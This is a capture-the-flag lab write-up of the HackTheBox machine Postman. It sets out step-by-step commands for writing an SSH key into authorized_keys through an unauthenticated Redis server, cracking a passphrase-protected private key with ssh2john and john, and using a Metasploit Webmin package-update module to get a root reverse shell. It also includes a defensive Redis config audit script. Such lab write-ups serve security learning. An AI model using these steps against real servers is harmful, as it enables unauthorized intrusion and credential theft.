Htb Postman Writeup

HackTheBox Postman Writeup

Overview

This is a write up of the HackTheBox machine Postman. OS : Linux, IP : 10.10.10.160, Difficulty : Easy.

Information Gathering

Nmap

I started my enumeration with an nmap scan, seen below, which revealed several open ports that I could investigate further.

  nmap -sC -sV 10.10.10.160
  Nmap scan report for 10.10.10.160
  Host is up (0.15s latency).
  Not shown: 997 closed ports
  PORT      STATE SERVICE VERSION
  22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
  |   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
  |_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
  80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: The Cyber Geek's Personal Website
  6379/tcp open  redis   Redis key-value store 4.0.9
  10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
  |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

This scan has revealed that ports 22, 80, 6379 and 10000 are open.

Website Discovery

When we go to the website running on port 80 we are taken to "The Cyber Geek's Personal Website", the page title nmap reported.

Basic discovery of the website doesn’t reveal anything useful, so we move on with enumeration.

Redis

As we can see from the nmap scan, redis is running version 4.0.9, which has many public vulnerabilities. We can use the redis-cli client to communicate with this server, and if it is unprotected (no password and no restricted bind address) it will accept our commands without any authentication.

  redis-cli -h 10.10.10.160
  10.10.10.160:6379> config get dir
  1) "dir"
  2) "/var/lib/redis"

The version of redis used on this machine has 2 major vulnerabilities which both have metasploit modules. Testing both of these however revealed that we were not able to use them.

Webmin httpd

Getting User

As we saw in the redis enumeration stage, the server's working directory (/var/lib/redis) is the home directory of the user that runs the redis server. We can confirm this by changing into its .ssh directory.

  10.10.10.160:6379> config set dir ./.ssh
  OK
  10.10.10.160:6379> config get dir
  1) "dir"
  2) "/var/lib/redis/.ssh"

As we have access to this directory we can attempt to add our own ssh key to the authorized_keys file. Generate a key with the ssh-keygen command and press enter through all the prompts. Add 2 new lines both above and below the public key so that the key survives the binary RDB header and footer redis writes around it and can still be interpreted by the SSH daemon.

  (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > publickey.txt

We are now going to use the -x option of redis-cli, which reads the last argument of the command from STDIN, so that we can pipe the file into redis-cli and store it as a value. In this case the STDIN argument is the public key we just generated and padded with new lines.

  cat publickey.txt | redis-cli -h 10.10.10.160 -x set crack
  OK

We now need to set the dbfilename to authorized_keys and then save the database so the dump is written into /var/lib/redis/.ssh/authorized_keys.

  10.10.10.160:6379> config set dir /var/lib/redis/.ssh
  OK
  10.10.10.160:6379> config set dbfilename "authorized_keys"
  OK
  10.10.10.160:6379> save
  OK

We can now log in through SSH.

  ssh -i id_rsa redis@10.10.10.160
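As an added defensive check, not part of the original writeup: a small Python audit of a redis.conf for the settings that made this chain possible (an unauthenticated client able to run CONFIG SET dir/dbfilename followed by SAVE). Both sample configs are constructed, and the requirepass value is a placeholder.

```python
import shlex

# Constructed sample: settings typical of an exposed Redis 4.x, as on Postman.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed sample: the same server after hardening (password is a placeholder).
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command SAVE ""
dir /var/lib/redis
"""

def parse_redis_conf(text):
    """Return (directive, args) pairs; comments and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles the quoted "" used to disable a command
        entries.append((parts[0].lower(), parts[1:]))
    return entries

def audit_redis_conf(text):
    """List the weaknesses that let a remote client write an RDB file into ~/.ssh."""
    entries = parse_redis_conf(text)
    values = {d: a for d, a in entries if d != "rename-command"}
    renamed = {a[0].upper(): a[1] for d, a in entries if d == "rename-command" and len(a) == 2}
    findings = []
    if any(b in ("0.0.0.0", "::", "*") for b in values.get("bind", ["0.0.0.0"])):
        findings.append("bind: listens on all interfaces")
    if values.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    if "requirepass" not in values:
        findings.append("requirepass: no password, anyone can run CONFIG SET and SAVE")
    for cmd in ("CONFIG", "SAVE"):
        if renamed.get(cmd) != "":  # only an empty rename fully disables the command
            findings.append(f"rename-command: {cmd} still reachable")
    return findings
```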

Getting The Second User

Once inside as the user redis we can begin local enumeration. The history command reveals that another user named Matt accessed a file named id_rsa.bak. Assuming that this is a backup of a private key, we can search for it using the find command.

  find / -name "id_rsa.bak" -ls 2>/dev/null

We can see that it is located in the /opt/ directory.

When we look into the id_rsa.bak file we can see that it is encrypted with a passphrase, so we first need to retrieve it to be able to crack it. We can retrieve it with scp, and once it's on our local system we can convert it to a hash using ssh2john.

  ./ssh2john.py matt_key > matt

Then cracking it using john reveals the password computer2008.

  john matt --wordlist=rockyou.txt
  computer2008

Finally, we can switch to this user from the redis SSH session by typing

  su Matt

You can now read the user flag with:

  cat user.txt

Getting Root

Accessing the webmin portal on port 10000 we can reuse the credentials that we have already found to access it. Through enumeration of this webmin portal we can see that many security packages are also disabled.

Through a google search we can see that there is an exploit that requires the credentials of a user who is authorized to use the Package Updates module.

A metasploit module already exists for this, so after opening msfconsole we can type

  use exploit/linux/http/webmin_packageup_rce

Configure the exploit with the following commands:

  set rhosts 10.10.10.160
  set username Matt
  set PASSWORD computer2008
  set lhost <local ip>
  set ssl true

We are given back a root shell where we can now access the root.txt flag.
